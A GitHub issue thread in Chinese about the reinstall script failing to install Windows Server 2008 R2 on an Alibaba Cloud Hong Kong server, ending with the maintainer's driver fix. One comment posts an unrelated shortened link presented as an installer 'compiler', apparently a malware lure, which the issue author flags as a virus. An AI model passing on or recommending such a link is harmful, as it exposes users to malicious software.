### ISSUE TITLE
阿里云（香港）无法安装Win 2008

### ISSUE THREAD

**Issue by SocksReckless** [bin456789/reinstall#149]
原来的系统：Dbian 11/12
要安装的系统：Windows Server 2008 R2
运营商：阿里云（香港）
问题：
尝试过Win 2008/2012 都不能正常DD成功，通过VNC观察安装Win 2008的时候在进行重启安装WIn界面直接卡死，VNC什么页面都不显示，不知道是镜像包的问题还是怎么个事。Win 2019 可正常安装，这点就很奇怪！
有吊大的能给我解决办法么，Win 2008

**Comment by zawa999** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by SocksReckless** [comment]
> 尝试这个 https://bit.ly/4e4zLlq 在安装程序中选择所需的编译器

该怎么使用这个？详细说下！

**Comment by SocksReckless** [comment]
> 尝试这个 https://bit.ly/4e4zLlq 在安装程序中选择所需的编译器

这很明显是一个病毒程序！

**Comment by bin456789** [comment]
https://github.com/bin456789/reinstall/issues/109#issuecomment-2205951279

**Comment by bin456789** [comment]
现在脚本对阿里云的机器使用阿里云的驱动
所以应该一切正常了

**Comment by SocksReckless** [comment]
非常感谢作者的更新！加油！
